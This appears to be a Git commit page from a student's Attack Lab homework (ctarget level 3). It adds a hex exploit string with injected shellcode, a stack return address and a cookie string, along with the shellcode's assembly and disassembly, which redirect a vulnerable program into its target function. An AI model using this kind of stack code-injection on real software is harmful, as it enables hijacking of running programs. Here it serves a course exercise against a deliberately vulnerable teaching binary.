ソースを参照

ctarget level3

homework3
邓博昊 7ヶ月前
コミット
e1773e3eca
5個のファイルの変更22行の追加0行の削除
  1. +6
    -0
      target66/phase_3.txt
  2. +12
    -0
      target66/phase_3_assembly.d
  3. バイナリ
      target66/phase_3_assembly.o
  4. +4
    -0
      target66/phase_3_assembly.s
  5. バイナリ
      target66/phase_3_raw.txt

+ 6
- 0
target66/phase_3.txt ファイルの表示

@ -0,0 +1,6 @@
48 c7 c7 78 1b 62 55 48
ba c0 1b 40 55 55 55 00
00 52 c3 00 00 00 00 00
58 1b 62 55 00 00 00 00
33 65 38 64 65 65 38 66
00

+ 12
- 0
target66/phase_3_assembly.d ファイルの表示

@ -0,0 +1,12 @@
phase_3_assembly.o 文件格式 elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 78 1b 62 55 mov $0x55621b78,%rdi
7: 48 ba c0 1b 40 55 55 movabs $0x555555401bc0,%rdx
e: 55 00 00
11: 52 push %rdx
12: c3 ret

バイナリ
target66/phase_3_assembly.o ファイルの表示


+ 4
- 0
target66/phase_3_assembly.s ファイルの表示

@ -0,0 +1,4 @@
movq $0x55621b78,%rdi
movq $0x0000555555401bc0,%rdx
push %rdx
ret

バイナリ
target66/phase_3_raw.txt ファイルの表示


読み込み中…
キャンセル
保存